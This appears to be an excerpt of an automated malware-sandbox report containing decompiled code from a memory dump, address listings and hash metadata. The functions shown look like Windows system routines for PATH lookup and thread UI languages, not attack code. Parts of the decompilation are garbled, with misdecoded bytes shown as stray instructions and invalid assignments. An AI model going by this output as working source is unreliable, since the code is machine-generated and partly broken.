													 *0x18d8480 & 0x0000ffff = E0182F3E0(__edi,  *0x18d8484,  *0x18d8480 & 0x0000ffff);
													__eax =  *0x18d8480 & 0x0000ffff;
													__eax = ( *0x18d8480 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													goto L28;
												case 3:
													__eax = _v44;
													__eflags = __eax;
													if(__eax == 0) {
														goto L29;
													} else {
														__esi = __eax + __eax;
														__eax = E0182F3E0(__edi, _v72, __esi);
														__edi = __edi + __esi;
														__esi = _v52;
														goto L27;
													}
													goto L108;
												case 4:
													_push(0x2e);
													_pop(__eax);
													 *(__esi + 0x44) = __edi;
													 *__edi = __ax;
													__edi = __edi + 4;
													_push(0x3b);
													_pop(__eax);
													 *(__edi - 2) = __ax;
													goto L29;
												case 5:
													__eflags = _v36;
													if(_v36 == 0) {
														goto L45;
													} else {
														E0182F3E0(_t321, _v76, _v36);
														_t268 = _v36;
													}
													L26:
													_t337 = _t337 + 0xc;
													_t321 = _t321 + (_t268 >> 1) * 2 + 2;
													__eflags = _t321;
													L27:
													_push(0x3b);
													_pop(_t270);
													 *((short*)(_t321 - 2)) = _t270;
													goto L28;
												case 6:
													__ebx =  *0x18d575c;
													__eflags = __ebx - 0x18d575c;
													if(__ebx != 0x18d575c) {
														_push(0x3b);
														_pop(__esi);
														do {
															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
															E0182F3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
															__edi = __edi + __eax * 2;
															__edi = __edi + 2;
															 *(__edi - 2) = __si;
															__ebx =  *__ebx;
															__eflags = __ebx - 0x18d575c;
														} while (__ebx != 0x18d575c);
														__esi = _v52;
														__ecx = _v16;
														__edx = _v32;
													}
													__ebx = _v56;
													goto L29;
												case 7:
													 *0x18d8478 & 0x0000ffff = E0182F3E0(__edi,  *0x18d847c,  *0x18d8478 & 0x0000ffff);
													__eax =  *0x18d8478 & 0x0000ffff;
													__eax = ( *0x18d8478 & 0x0000ffff) >> 1;
													__eflags = _a8;
													__edi = __edi + __eax * 2;
													if(_a8 != 0) {
														__ecx = __edi;
														__eax = E018739F2(__ecx);
														__edi = __eax;
													}
													goto L28;
												case 8:
													__eax = 0;
													 *(__edi - 2) = __ax;
													 *0x18d6e58 & 0x0000ffff = E0182F3E0(__edi,  *0x18d6e5c,  *0x18d6e58 & 0x0000ffff);
													 *(__esi + 0x38) = __edi;
													__eax =  *0x18d6e58 & 0x0000ffff;
													__eax = ( *0x18d6e58 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													__edi = __edi + 2;
													L28:
													_t292 = _v16;
													_t308 = _v32;
													L29:
													_t279 = _t279 + 4;
													__eflags = _t279;
													_v56 = _t279;
													goto L30;
											}
										}
									}
									goto L108;
									L30:
									_t292 = _t292 + 1;
									_v16 = _t292;
									__eflags = _t292 - _v48;
								} while (_t292 < _v48);
								goto L31;
							}
						}
					}
				} else {
					while(1) {
						L1:
						_t242 =  *(_v60 + _t319 * 4);
						if(_t242 > 8) {
							break;
						}
						switch( *((intOrPtr*)(_t242 * 4 +  &M01812935))) {
							case 0:
								__ax =  *0x18d8488;
								__eflags = __ax;
								if(__ax != 0) {
									__eax = __ax & 0x0000ffff;
									__ebx = __ebx + 2;
									__eflags = __ebx;
									goto L53;
								}
								goto L14;
							case 1:
								L44:
								_t308 =  &_v64;
								_v80 = E01812E3E(0,  &_v64);
								_t279 = _t279 + _v64 + 2;
								goto L13;
							case 2:
								__eax =  *0x18d8480 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x18d8480;
									goto L80;
								}
								goto L14;
							case 3:
								__eax = E017FEEF0(0x18d79a0);
								__eax =  &_v44;
								_push(__eax);
								_push(0);
								_push(0);
								_push(4);
								_push(L"PATH");
								_push(0);
								L57();
								__esi = __eax;
								_v68 = __esi;
								__eflags = __esi - 0xc0000023;
								if(__esi != 0xc0000023) {
									L10:
									__eax = E017FEB70(__ecx, 0x18d79a0);
									__eflags = __esi - 0xc0000100;
									if(__esi == 0xc0000100) {
										_v44 = _v44 & 0x00000000;
										__eax = 0;
										_v68 = 0;
										goto L13;
									} else {
										__eflags = __esi;
										if(__esi < 0) {
											L32:
											_t216 = _v72;
											__eflags = _t216;
											if(_t216 != 0) {
												L018077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t216);
											}
											_t217 = _v52;
											__eflags = _t217;
											if(_t217 != 0) {
												__eflags = _t327;
												if(_t327 < 0) {
													L018077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t217);
													_t217 = 0;
												}
											}
											goto L36;
										} else {
											__eax = _v44;
											__ebx = __ebx + __eax * 2;
											__ebx = __ebx + 2;
											__eflags = __ebx;
											L13:
											_t288 = _v36;
											goto L14;
										}
									}
								} else {
									__eax = _v44;
									__ecx =  *0x18d7b9c; // 0x0
									_v44 + _v44 =  *[fs:0x30];
									__ecx = __ecx + 0x180000;
									__eax = E01804620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
									_v72 = __eax;
									__eflags = __eax;
									if(__eax == 0) {
										__eax = E017FEB70(__ecx, 0x18d79a0);
										__eax = _v52;
										L36:
										_pop(_t320);
										_pop(_t328);
										__eflags = _v8 ^ _t334;
										_pop(_t280);
										return E0182B640(_t217, _t280, _v8 ^ _t334, _t308, _t320, _t328);
									} else {
										__ecx =  &_v44;
										_push(__ecx);
										_push(_v44);
										_push(__eax);
										_push(4);
										_push(L"PATH");
										_push(0);
										L57();
										__esi = __eax;
										_v68 = __eax;
										goto L10;
									}
								}
								goto L108;
							case 4:
								__ebx = __ebx + 4;
								goto L14;
							case 5:
								_t275 = _v56;
								if(_v56 != 0) {
									_t308 =  &_v36;
									_t277 = E01812E3E(_t275,  &_v36);
									_t288 = _v36;
									_v76 = _t277;
								}
								if(_t288 == 0) {
									goto L44;
								} else {
									_t279 = _t279 + 2 + _t288;
								}
								goto L14;
							case 6:
								__eax =  *0x18d5764 & 0x0000ffff;
								goto L53;
							case 7:
								__eax =  *0x18d8478 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = _a8;
								if(_a8 != 0) {
									__ebx = __ebx + 0x16;
									__ebx = __ebx + __eax;
								}
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x18d8478;
									L80:
									_v32 = __eax;
								}
								goto L14;
							case 8:
								__eax =  *0x18d6e58 & 0x0000ffff;
								__eax = ( *0x18d6e58 & 0x0000ffff) + 2;
								L53:
								__ebx = __ebx + __eax;
								L14:
								_t319 = _t319 + 1;
								if(_t319 >= _v48) {
									goto L16;
								} else {
									_t308 = _v37;
									goto L1;
								}
								goto L108;
						}
					}
					L56:
					_t293 = 0x25;
					asm("int 0x29");
					asm("out 0x28, al");
					 *_t293 =  *_t293 + 0x1812866;
					asm("loopne 0x29");
					 *_t293 =  *_t293 + 0x181262e;
					 *((intOrPtr*)(_t293 - 0x7ed9faff)) =  *((intOrPtr*)(_t293 - 0x7ed9faff)) - _t242;
					 *_t321 =  *_t321 + _t279;
					_pop(_t283);
					__eflags =  *_t293 & _t242;
					_t243 = _t337;
					_t339 = _t242;
					 *((intOrPtr*)(_t293 - 0x7aa4caff)) =  *((intOrPtr*)(_t293 - 0x7aa4caff)) - _t243;
					 *_t308 =  *_t308 + _t243;
					 *((intOrPtr*)(_t293 - 0x7ed77fff)) =  *((intOrPtr*)(_t293 - 0x7ed77fff)) - _t243;
					asm("daa");
					 *_t293 =  *_t293 + 0x181281e;
					_t331 = _t326 + 1 + _t326 + 1 - 1;
					 *((intOrPtr*)(_t293 - 0x7ed8a2ff)) =  *((intOrPtr*)(_t293 - 0x7ed8a2ff)) - _t243;
					_pop(_t284);
					__eflags =  *_t293 & _t243 + _t283;
					 *_t293 =  *_t293 + 0x1855c34;
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(0x20);
					_push(0x18bff00);
					E0183D08C(_t284, _t321, _t331);
					_v44 =  *[fs:0x18];
					_t322 = 0;
					 *_a24 = 0;
					_t285 = _a12;
					__eflags = _t285;
					if(_t285 == 0) {
						_t248 = 0xc0000100;
					} else {
						_v8 = 0;
						_t332 = 0xc0000100;
						_v52 = 0xc0000100;
						_t250 = 4;
						while(1) {
							_v40 = _t250;
							__eflags = _t250;
							if(_t250 == 0) {
								break;
							}
							_t298 = _t250 * 0xc;
							_v48 = _t298;
							__eflags = _t285 -  *((intOrPtr*)(_t298 + 0x17c1664));
							if(__eflags <= 0) {
								if(__eflags == 0) {
									_t265 = E0182E5C0(_a8,  *((intOrPtr*)(_t298 + 0x17c1668)), _t285);
									_t339 = _t339 + 0xc;
									__eflags = _t265;
									if(__eflags == 0) {
										_t332 = E018651BE(_t285,  *((intOrPtr*)(_v48 + 0x17c166c)), _a16, _t322, _t332, __eflags, _a20, _a24);
										_v52 = _t332;
										break;
									} else {
										_t250 = _v40;
										goto L62;
									}
									goto L70;
								} else {
									L62:
									_t250 = _t250 - 1;
									continue;
								}
							}
							break;
						}
						_v32 = _t332;
						__eflags = _t332;
						if(_t332 < 0) {
							__eflags = _t332 - 0xc0000100;
							if(_t332 == 0xc0000100) {
								_t294 = _a4;
								__eflags = _t294;
								if(_t294 != 0) {
									_v36 = _t294;
									__eflags =  *_t294 - _t322;
									if( *_t294 == _t322) {
										_t332 = 0xc0000100;
										goto L76;
									} else {
										_t310 =  *((intOrPtr*)(_v44 + 0x30));
										_t252 =  *((intOrPtr*)(_t310 + 0x10));
										__eflags =  *((intOrPtr*)(_t252 + 0x48)) - _t294;
										if( *((intOrPtr*)(_t252 + 0x48)) == _t294) {
											__eflags =  *(_t310 + 0x1c);
											if( *(_t310 + 0x1c) == 0) {
												L106:
												_t332 = E01812AE4( &_v36, _a8, _t285, _a16, _a20, _a24);
												_v32 = _t332;
												__eflags = _t332 - 0xc0000100;
												if(_t332 != 0xc0000100) {
													goto L69;
												} else {
													_t322 = 1;
													_t294 = _v36;
													goto L75;
												}
											} else {
												_t255 = E017F6600( *(_t310 + 0x1c));
												__eflags = _t255;
												if(_t255 != 0) {
													goto L106;
												} else {
													_t294 = _a4;
													goto L75;
												}
											}
										} else {
											L75:
											_t332 = E01812C50(_t294, _a8, _t285, _a16, _a20, _a24, _t322);
											L76:
											_v32 = _t332;
											goto L69;
										}
									}
									goto L108;
								} else {
									E017FEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
									_v8 = 1;
									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
									_t332 = _a24;
									_t262 = E01812AE4( &_v36, _a8, _t285, _a16, _a20, _t332);
									_v32 = _t262;
									__eflags = _t262 - 0xc0000100;
									if(_t262 == 0xc0000100) {
										_v32 = E01812C50(_v36, _a8, _t285, _a16, _a20, _t332, 1);
									}
									_v8 = _t322;
									E01812ACB();
								}
							}
						}
						L69:
						_v8 = 0xfffffffe;
						_t248 = _t332;
					}
					L70:
					return E0183D0D1(_t248);
				}
				L108:
			}





















































                                                        0x01812584
                                                        0x01812586
                                                        0x01812590
                                                        0x01812596
                                                        0x01812597
                                                        0x01812598
                                                        0x01812599
                                                        0x0181259e
                                                        0x018125a4
                                                        0x018125a9
                                                        0x018125ac
                                                        0x018125ae
                                                        0x018125b1
                                                        0x018125b2
                                                        0x018125b5
                                                        0x018125b8
                                                        0x018125bb
                                                        0x018125bc
                                                        0x018125bf
                                                        0x018125c2
                                                        0x018125c5
                                                        0x018125c6
                                                        0x018125cb
                                                        0x018125ce
                                                        0x018125d8
                                                        0x018125dd
                                                        0x018125de
                                                        0x018125e1
                                                        0x018125e3
                                                        0x018125e9
                                                        0x018126da
                                                        0x018126da
                                                        0x018126dd
                                                        0x018126e2
                                                        0x01855b56
                                                        0x00000000
                                                        0x018126e8
                                                        0x018126f9
                                                        0x018126fb
                                                        0x018126fe
                                                        0x01812700
                                                        0x01855b60
                                                        0x00000000
                                                        0x01812706
                                                        0x01812706
                                                        0x0181270a
                                                        0x0181270a
                                                        0x0181270d
                                                        0x01812713
                                                        0x01812716
                                                        0x01812718
                                                        0x0181271c
                                                        0x0181271e
                                                        0x01855b6c
                                                        0x01855b6f
                                                        0x01855b7f
                                                        0x01855b89
                                                        0x01855b8e
                                                        0x01855b93
                                                        0x01855b96
                                                        0x01855b9c
                                                        0x01855ba0
                                                        0x01855ba3
                                                        0x01855bab
                                                        0x01855bb0
                                                        0x01855bb3
                                                        0x01855bb3
                                                        0x01855ba3
                                                        0x01812724
                                                        0x01812726
                                                        0x01812729
                                                        0x0181272c
                                                        0x0181279d
                                                        0x0181279d
                                                        0x018127a0
                                                        0x018127a2
                                                        0x00000000
                                                        0x0181272e
                                                        0x0181272e
                                                        0x01812731
                                                        0x01812734
                                                        0x01812734
                                                        0x01812736
                                                        0x01855bc1
                                                        0x01855bc1
                                                        0x01855bc4
                                                        0x00000000
                                                        0x01855bca
                                                        0x01855bca
                                                        0x01855bcd
                                                        0x00000000
                                                        0x01855bd3
                                                        0x00000000
                                                        0x01855bd3
                                                        0x01855bcd
                                                        0x0181273c
                                                        0x0181273c
                                                        0x01812742
                                                        0x01812747
                                                        0x0181274a
                                                        0x0181274d
                                                        0x01812750
                                                        0x00000000
                                                        0x01812756
                                                        0x01812756
                                                        0x00000000
                                                        0x01812902
                                                        0x01812908
                                                        0x0181290b
                                                        0x00000000
                                                        0x01812911
                                                        0x0181291c
                                                        0x01812921
                                                        0x00000000
                                                        0x01812921
                                                        0x00000000
                                                        0x00000000
                                                        0x01812880
                                                        0x01812887
                                                        0x0181288c
                                                        0x00000000
                                                        0x00000000
                                                        0x01812805
                                                        0x0181280a
                                                        0x01812814
                                                        0x01812816
                                                        0x00000000
                                                        0x00000000
                                                        0x0181281e
                                                        0x01812821
                                                        0x01812823
                                                        0x00000000
                                                        0x01812829
                                                        0x01812829
                                                        0x01812831
                                                        0x0181283c
                                                        0x0181283e
                                                        0x00000000
                                                        0x0181283e
                                                        0x00000000
                                                        0x00000000
                                                        0x0181284e
                                                        0x01812850
                                                        0x01812851
                                                        0x01812854
                                                        0x01812857
                                                        0x0181285a
                                                        0x0181285c
                                                        0x0181285d
                                                        0x00000000
                                                        0x00000000
                                                        0x0181275d
                                                        0x01812761
                                                        0x00000000
                                                        0x01812767
                                                        0x0181276e
                                                        0x01812773
                                                        0x01812773
                                                        0x01812776
                                                        0x01812778
                                                        0x0181277e
                                                        0x0181277e
                                                        0x01812781
                                                        0x01812781
                                                        0x01812783
                                                        0x01812784
                                                        0x00000000
                                                        0x00000000
                                                        0x01855bd8
                                                        0x01855bde
                                                        0x01855be4
                                                        0x01855be6
                                                        0x01855be8
                                                        0x01855be9
                                                        0x01855bee
                                                        0x01855bf8
                                                        0x01855bff
                                                        0x01855c01
                                                        0x01855c04
                                                        0x01855c07
                                                        0x01855c0b
                                                        0x01855c0d
                                                        0x01855c0d
                                                        0x01855c15
                                                        0x01855c18
                                                        0x01855c1b
                                                        0x01855c1b
                                                        0x01855c1e
                                                        0x00000000
                                                        0x00000000
                                                        0x018128c3
                                                        0x018128c8
                                                        0x018128d2
                                                        0x018128d4
                                                        0x018128d8
                                                        0x018128db
                                                        0x01855c26
                                                        0x01855c28
                                                        0x01855c2d
                                                        0x01855c2d
                                                        0x00000000
                                                        0x00000000
                                                        0x01855c34
                                                        0x01855c36
                                                        0x01855c49
                                                        0x01855c4e
                                                        0x01855c54
                                                        0x01855c5b
                                                        0x01855c5d
                                                        0x01855c60
                                                        0x01812788
                                                        0x01812788
                                                        0x0181278b
                                                        0x0181278e
                                                        0x0181278e
                                                        0x0181278e
                                                        0x01812791
                                                        0x00000000
                                                        0x00000000
                                                        0x01812756
                                                        0x01812750
                                                        0x00000000
                                                        0x01812794
                                                        0x01812794
                                                        0x01812795
                                                        0x01812798
                                                        0x01812798
                                                        0x00000000
                                                        0x01812734
                                                        0x0181272c
                                                        0x01812700
                                                        0x018125ef
                                                        0x018125ef
                                                        0x018125ef
                                                        0x018125f2
                                                        0x018125f8
                                                        0x00000000
                                                        0x00000000
                                                        0x018125fe
                                                        0x00000000
                                                        0x018128e6
                                                        0x018128ec
                                                        0x018128ef
                                                        0x018128f5
                                                        0x018128f8
                                                        0x018128f8
                                                        0x00000000
                                                        0x018128f8
                                                        0x00000000
                                                        0x00000000
                                                        0x01812866
                                                        0x01812866
                                                        0x01812876
                                                        0x01812879
                                                        0x00000000
                                                        0x00000000
                                                        0x018127e0
                                                        0x018127e7
                                                        0x018127e9
                                                        0x018127eb
                                                        0x01855afd
                                                        0x00000000
                                                        0x01855afd
                                                        0x00000000
                                                        0x00000000
                                                        0x01812633
                                                        0x01812638
                                                        0x0181263b
                                                        0x0181263c
                                                        0x0181263e
                                                        0x01812640
                                                        0x01812642
                                                        0x01812647
                                                        0x01812649
                                                        0x0181264e
                                                        0x01812650
                                                        0x01812653
                                                        0x01812659
                                                        0x018126a2
                                                        0x018126a7
                                                        0x018126ac
                                                        0x018126b2
                                                        0x01855b11
                                                        0x01855b15
                                                        0x01855b17
                                                        0x00000000
                                                        0x018126b8
                                                        0x018126b8
                                                        0x018126ba
                                                        0x018127a6
                                                        0x018127a6
                                                        0x018127a9
                                                        0x018127ab
                                                        0x018127b9
                                                        0x018127b9
                                                        0x018127be
                                                        0x018127c1
                                                        0x018127c3
                                                        0x018127c5
                                                        0x018127c7
                                                        0x01855c74
                                                        0x01855c79
                                                        0x01855c79
                                                        0x018127c7
                                                        0x00000000
                                                        0x018126c0
                                                        0x018126c0
                                                        0x018126c3
                                                        0x018126c6
                                                        0x018126c6
                                                        0x018126c9
                                                        0x018126c9
                                                        0x00000000
                                                        0x018126c9
                                                        0x018126ba
                                                        0x0181265b
                                                        0x0181265b
                                                        0x0181265e
                                                        0x01812667
                                                        0x0181266d
                                                        0x01812677
                                                        0x0181267c
                                                        0x0181267f
                                                        0x01812681
                                                        0x01855b49
                                                        0x01855b4e
                                                        0x018127cd
                                                        0x018127d0
                                                        0x018127d1
                                                        0x018127d2
                                                        0x018127d4
                                                        0x018127dd
                                                        0x01812687
                                                        0x01812687
                                                        0x0181268a
                                                        0x0181268b
                                                        0x0181268e
                                                        0x0181268f
                                                        0x01812691
                                                        0x01812696
                                                        0x01812698
                                                        0x0181269d
                                                        0x0181269f
                                                        0x00000000
                                                        0x0181269f
                                                        0x01812681
                                                        0x00000000
                                                        0x00000000
                                                        0x01812846
                                                        0x00000000
                                                        0x00000000
                                                        0x01812605
                                                        0x0181260a
                                                        0x0181260c
                                                        0x01812611
                                                        0x01812616
                                                        0x01812619
                                                        0x01812619
                                                        0x0181261e
                                                        0x00000000
                                                        0x01812624
                                                        0x01812627
                                                        0x01812627
                                                        0x00000000
                                                        0x00000000
                                                        0x01855b1f
                                                        0x00000000
                                                        0x00000000
                                                        0x01812894
                                                        0x0181289b
                                                        0x0181289d
                                                        0x018128a1
                                                        0x01855b2b
                                                        0x01855b2e
                                                        0x01855b2e
                                                        0x018128a7
                                                        0x018128a9
                                                        0x01855b04
                                                        0x01855b09
                                                        0x01855b09
                                                        0x01855b09
                                                        0x00000000
                                                        0x00000000
                                                        0x01855b35
                                                        0x01855b3c
                                                        0x018128fb
                                                        0x018128fb
                                                        0x018126cc
                                                        0x018126cc
                                                        0x018126d0
                                                        0x00000000
                                                        0x018126d2
                                                        0x018126d2
                                                        0x00000000
                                                        0x018126d2
                                                        0x00000000
                                                        0x00000000
                                                        0x018125fe
                                                        0x0181292d
                                                        0x0181292f
                                                        0x01812930
                                                        0x01812935
                                                        0x01812937
                                                        0x0181293d
                                                        0x0181293f
                                                        0x01812946
                                                        0x0181294c
                                                        0x0181294e
                                                        0x0181294f
                                                        0x01812951
                                                        0x01812951
                                                        0x01812952
                                                        0x01812958
                                                        0x0181295a
                                                        0x01812962
                                                        0x01812963
                                                        0x01812969
                                                        0x0181296a
                                                        0x01812972
                                                        0x01812973
                                                        0x01812977
                                                        0x0181297d
                                                        0x0181297e
                                                        0x0181297f
                                                        0x01812980
                                                        0x01812981
                                                        0x01812982
                                                        0x01812983
                                                        0x01812984
                                                        0x01812985
                                                        0x01812986
                                                        0x01812987
                                                        0x01812988
                                                        0x01812989
                                                        0x0181298a
                                                        0x0181298b
                                                        0x0181298c
                                                        0x0181298d
                                                        0x0181298e
                                                        0x0181298f
                                                        0x01812990
                                                        0x01812992
                                                        0x01812997
                                                        0x018129a3
                                                        0x018129a6
                                                        0x018129ab
                                                        0x018129ad
                                                        0x018129b0
                                                        0x018129b2
                                                        0x01855c80
                                                        0x018129b8
                                                        0x018129b8
                                                        0x018129bb
                                                        0x018129c0
                                                        0x018129c5
                                                        0x018129c6
                                                        0x018129c6
                                                        0x018129c9
                                                        0x018129cb
                                                        0x00000000
                                                        0x00000000
                                                        0x018129cd
                                                        0x018129d0
                                                        0x018129d9
                                                        0x018129db
                                                        0x018129dd
                                                        0x01812a7f
                                                        0x01812a84
                                                        0x01812a87
                                                        0x01812a89
                                                        0x01855ca1
                                                        0x01855ca3
                                                        0x00000000
                                                        0x01812a8f
                                                        0x01812a8f
                                                        0x00000000
                                                        0x01812a8f
                                                        0x00000000
                                                        0x018129e3
                                                        0x018129e3
                                                        0x018129e3
                                                        0x00000000
                                                        0x018129e3
                                                        0x018129dd
                                                        0x00000000
                                                        0x018129db
                                                        0x018129e6
                                                        0x018129e9
                                                        0x018129eb
                                                        0x018129ed
                                                        0x018129f3
                                                        0x018129f5
                                                        0x018129f8
                                                        0x018129fa
                                                        0x01812a97
                                                        0x01812a9a
                                                        0x01812a9d
                                                        0x01812add
                                                        0x00000000
                                                        0x01812a9f
                                                        0x01812aa2
                                                        0x01812aa5
                                                        0x01812aa8
                                                        0x01812aab
                                                        0x01855cab
                                                        0x01855caf
                                                        0x01855cc5
                                                        0x01855cda
                                                        0x01855cdc
                                                        0x01855cdf
                                                        0x01855ce5
                                                        0x00000000
                                                        0x01855ceb
                                                        0x01855ced
                                                        0x01855cee
                                                        0x00000000
                                                        0x01855cee
                                                        0x01855cb1
                                                        0x01855cb4
                                                        0x01855cb9
                                                        0x01855cbb
                                                        0x00000000
                                                        0x01855cbd
                                                        0x01855cbd
                                                        0x00000000
                                                        0x01855cbd
                                                        0x01855cbb
                                                        0x01812ab1
                                                        0x01812ab1
                                                        0x01812ac4
                                                        0x01812ac6
                                                        0x01812ac6
                                                        0x00000000
                                                        0x01812ac6
                                                        0x01812aab
                                                        0x00000000
                                                        0x01812a00
                                                        0x01812a09
                                                        0x01812a0e
                                                        0x01812a21
                                                        0x01812a24
                                                        0x01812a35
                                                        0x01812a3a
                                                        0x01812a3d
                                                        0x01812a42
                                                        0x01812a59
                                                        0x01812a59
                                                        0x01812a5c
                                                        0x01812a5f
                                                        0x01812a5f
                                                        0x018129fa
                                                        0x018129f3
                                                        0x01812a64
                                                        0x01812a64
                                                        0x01812a6b
                                                        0x01812a6b
                                                        0x01812a6d
                                                        0x01812a72
                                                        0x01812a72
                                                        0x00000000

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: PATH
                                                        • API String ID: 0-1036084923
                                                        • Opcode ID: c39ec68c595d7869a853135641d74688f6510ab23d64999dc1d1bac731885a49
                                                        • Instruction ID: 66152acf4026efabc9dede9f9d73778461555650e7b8c4fc1a9a0199b8aabf5d
                                                        • Opcode Fuzzy Hash: c39ec68c595d7869a853135641d74688f6510ab23d64999dc1d1bac731885a49
                                                        • Instruction Fuzzy Hash: CFC1C1B2D00219DFCB25DF9DD880BAEBBB6FF48710F544429E901EB254D734AA41CB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0181FAB0 Relevance: 1.6, Strings: 1, Instructions: 306COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 80%
                                                        			E0181FAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
				char _v5;
				signed int _v8;
				signed int _v12;
				char _v16;
				char _v17;
				char _v20;
				signed int _v24;
				char _v28;
				char _v32;
				signed int _v40;
				void* __ecx;
				void* __edi;
				void* __ebp;
				signed int _t73;
				intOrPtr* _t75;
				signed int _t77;
				signed int _t79;
				signed int _t81;
				intOrPtr _t83;
				intOrPtr _t85;
				intOrPtr _t86;
				signed int _t91;
				signed int _t94;
				signed int _t95;
				signed int _t96;
				signed int _t106;
				signed int _t108;
				signed int _t114;
				signed int _t116;
				signed int _t118;
				signed int _t122;
				signed int _t123;
				void* _t129;
				signed int _t130;
				void* _t132;
				intOrPtr* _t134;
				signed int _t138;
				signed int _t141;
				signed int _t147;
				intOrPtr _t153;
				signed int _t154;
				signed int _t155;
				signed int _t170;
				void* _t174;
				signed int _t176;
				signed int _t177;

				_t129 = __ebx;
				_push(_t132);
				_push(__esi);
				_t174 = _t132;
				_t73 =  !( *( *(_t174 + 0x18)));
				if(_t73 >= 0) {
					L5:
					return _t73;
				} else {
					E017FEEF0(0x18d7b60);
					_t134 =  *0x18d7b84; // 0x771a7b80
					_t2 = _t174 + 0x24; // 0x24
					_t75 = _t2;
					if( *_t134 != 0x18d7b80) {
						_push(3);
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x18d7b60);
						_t170 = _v8;
						_v28 = 0;
						_v40 = 0;
						_v24 = 0;
						_v17 = 0;
						_v32 = 0;
						__eflags = _t170 & 0xffff7cf2;
						if((_t170 & 0xffff7cf2) != 0) {
							L43:
							_t77 = 0xc000000d;
						} else {
							_t79 = _t170 & 0x0000000c;
							__eflags = _t79;
							if(_t79 != 0) {
								__eflags = _t79 - 0xc;
								if(_t79 == 0xc) {
									goto L43;
								} else {
									goto L9;
								}
							} else {
								_t170 = _t170 | 0x00000008;
								__eflags = _t170;
								L9:
								_t81 = _t170 & 0x00000300;
								__eflags = _t81 - 0x300;
								if(_t81 == 0x300) {
									goto L43;
								} else {
									_t138 = _t170 & 0x00000001;
									__eflags = _t138;
									_v24 = _t138;
									if(_t138 != 0) {
										__eflags = _t81;
										if(_t81 != 0) {
											goto L43;
										} else {
											goto L11;
										}
									} else {
										L11:
										_push(_t129);
										_t77 = E017F6D90( &_v20);
										_t130 = _t77;
										__eflags = _t130;
										if(_t130 >= 0) {
											_push(_t174);
											__eflags = _t170 & 0x00000301;
											if((_t170 & 0x00000301) == 0) {
												_t176 = _a8;
												__eflags = _t176;
												if(__eflags == 0) {
													L64:
													_t83 =  *[fs:0x18];
													_t177 = 0;
													__eflags =  *(_t83 + 0xfb8);
													if( *(_t83 + 0xfb8) != 0) {
														E017F76E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
													}
													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
													goto L15;
												} else {
													asm("sbb edx, edx");
													_t114 = E01888938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
													__eflags = _t114;
													if(_t114 < 0) {
														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
														E017EB150();
													}
													_t116 = E01886D81(_t176,  &_v16);
													__eflags = _t116;
													if(_t116 >= 0) {
														__eflags = _v16 - 2;
														if(_v16 < 2) {
															L56:
															_t118 = E017F75CE(_v20, 5, 0);
															__eflags = _t118;
															if(_t118 < 0) {
																L67:
																_t130 = 0xc0000017;
																goto L32;
															} else {
																__eflags = _v12;
																if(_v12 == 0) {
																	goto L67;
																} else {
																	_t153 =  *0x18d8638; // 0x0
																	_t122 = L017F38A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
																	_t154 = _v12;
																	_t130 = _t122;
																	__eflags = _t130;
																	if(_t130 >= 0) {
																		_t123 =  *(_t154 + 4) & 0x0000ffff;
																		__eflags = _t123;
																		if(_t123 != 0) {
																			_t155 = _a12;
																			__eflags = _t155;
																			if(_t155 != 0) {
																				 *_t155 = _t123;
																			}
																			goto L64;
																		} else {
																			E017F76E2(_t154);
																			goto L41;
																		}
																	} else {
																		E017F76E2(_t154);
																		_t177 = 0;
																		goto L18;
																	}
																}
															}
														} else {
															__eflags =  *_t176;
															if( *_t176 != 0) {
																goto L56;
															} else {
																__eflags =  *(_t176 + 2);
																if( *(_t176 + 2) == 0) {
																	goto L64;
																} else {
																	goto L56;
																}
															}
														}
													} else {
														_t130 = 0xc000000d;
														goto L32;
													}
												}
												goto L35;
											} else {
												__eflags = _a8;
												if(_a8 != 0) {
													_t77 = 0xc000000d;
												} else {
													_v5 = 1;
													L0181FCE3(_v20, _t170);
													_t177 = 0;
													__eflags = 0;
													L15:
													_t85 =  *[fs:0x18];
													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
